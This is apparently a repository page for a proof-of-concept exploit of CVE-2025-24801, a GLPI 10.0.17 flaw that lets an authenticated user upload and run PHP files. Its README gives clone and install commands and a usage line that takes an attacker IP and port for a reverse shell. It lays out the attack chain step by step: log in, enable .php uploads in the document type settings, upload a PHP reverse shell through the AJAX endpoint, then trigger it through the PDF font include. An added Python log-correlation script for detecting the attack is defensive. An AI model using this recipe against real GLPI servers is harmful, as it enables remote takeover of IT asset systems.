CVE-2025-24801 PoC — GLPI Code Issue Vulnerability

Associated Vulnerability
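Title: GLPI Code Issue Vulnerability (CVE-2025-24801)
Description: GLPI is an open-source IT and asset management software from GLPI. It provides a full-featured IT resource management interface that you can use to build a database for comprehensively managing IT computers, monitors, servers, printers, network devices, phones, and even toner and ink cartridges. GLPI has a code issue vulnerability that arises because an authenticated user can upload and force the execution of PHP files located on the GLPI server.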
Description
CVE-2025-24801 Exploit 
Readme
# CVE-2025-24801 PoC for GLPI RCE

This repository contains a proof-of-concept script (`poc.py`) that exploits CVE-2025-24801, an LFI-to-RCE vulnerability in GLPI 10.0.17. It automates:

* Logging into GLPI
* Enabling `.php` uploads by updating document type settings
* Uploading a PHP reverse shell via the AJAX file upload endpoint

## 🛠️ Installation

```bash
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
```

## 🚀 Usage

```bash
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
```

* `--url`: Base URL of the GLPI instance (e.g. `https://example.com/glpi`)
* `--user` / `--password`: Valid GLPI technician credentials
* `--lhost` / `--lport`: Attacker IP and port for the reverse shell listener

The script automatically uses `--doc-id 1` by default to update the first document type.

After execution, the script will:

1. Log in and establish a session
2. Enable `.php` uploads by updating document type ID 1
3. Upload `exploit.php` containing a PHP reverse shell payload

You will then need to manually trigger the LFI by specifying the uploaded filename in the PDF font include (e.g., via the report export feature) to achieve RCE.

## 📑 How It Works

1. **Login**: Extracts the CSRF token from `/front/login.php` and posts credentials to authenticate.
2. **Enable PHP Uploads**: Fetches `/front/documenttype.form.php?id=1`, parses the CSRF token, and adds `php` to the allowed extensions.
3. **Upload Shell**: Fetches `/front/ticket.form.php` for a CSRF token, then uses `/ajax/fileupload.php` (with `X-Requested-With: XMLHttpRequest`) to upload a PHP reverse shell.
4. **Trigger RCE**: Manually invoke the PDF font LFI by specifying the uploaded shell filename in the `pdffont` parameter during report export.
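
For defenders, steps 2 and 3 above leave a recognisable pair of requests in the web server's access log: a POST to the document type form followed shortly by a POST to the AJAX upload endpoint from the same client. The sketch below is an added example, not part of this repository, that correlates the two. The log format, the sample lines, the 10-minute window and the assumption that the document type change is POSTed to the same form path are all assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed access-log lines (Apache common log format), not from a real system.
SAMPLE_LOG = """\
198.51.100.9 - - [12/Mar/2025:09:00:00 +0000] "POST /glpi/front/documenttype.form.php HTTP/1.1" 302 0
203.0.113.7 - - [12/Mar/2025:10:01:03 +0000] "POST /glpi/front/login.php HTTP/1.1" 302 0
203.0.113.7 - - [12/Mar/2025:10:01:04 +0000] "GET /glpi/front/documenttype.form.php?id=1 HTTP/1.1" 200 8000
203.0.113.7 - - [12/Mar/2025:10:01:05 +0000] "POST /glpi/front/documenttype.form.php HTTP/1.1" 302 0
203.0.113.7 - - [12/Mar/2025:10:01:06 +0000] "GET /glpi/front/ticket.form.php HTTP/1.1" 200 9000
203.0.113.7 - - [12/Mar/2025:10:01:07 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 300
198.51.100.20 - - [12/Mar/2025:11:00:00 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 300
198.51.100.9 - - [12/Mar/2025:12:30:00 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 300
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" \d{3}'
)
DOCTYPE_FORM = "/front/documenttype.form.php"   # step 2 endpoint from the README
UPLOAD_ENDPOINT = "/ajax/fileupload.php"        # step 3 endpoint from the README


def find_chains(log_text, window_minutes=10):
    """Return (client_ip, edit_time, upload_time) for each edit-then-upload pair.

    Assumes lines are in chronological order and that the document type
    change is POSTed to the same form path the README fetches.
    """
    window = timedelta(minutes=window_minutes)
    last_edit = {}  # client IP -> time of its most recent document type POST
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]
        if path.endswith(DOCTYPE_FORM):
            last_edit[m["ip"]] = when
        elif path.endswith(UPLOAD_ENDPOINT) and m["ip"] in last_edit:
            if when - last_edit[m["ip"]] <= window:
                hits.append((m["ip"], last_edit[m["ip"]], when))
    return hits


if __name__ == "__main__":
    for ip, edited, uploaded in find_chains(SAMPLE_LOG):
        print(f"{ip}: document type POST {edited}, upload POST {uploaded}")
```

An administrator can produce the same pair legitimately, so each hit is a lead for triage: check whether `php` now appears in that document type's allowed extensions and what was uploaded.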

## ⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Do not use it against systems without explicit permission.

---

*Created for educational and authorized pentesting purposes.*
File Snapshot

```
[4.0K] /data/pocs/94d2be6aee5264a2b6228640fdbc2ce8845e3718
├── [2.8K] exploit.py
├── [2.1K] README.md
└── [  40] requirements.txt

0 directories, 3 files
```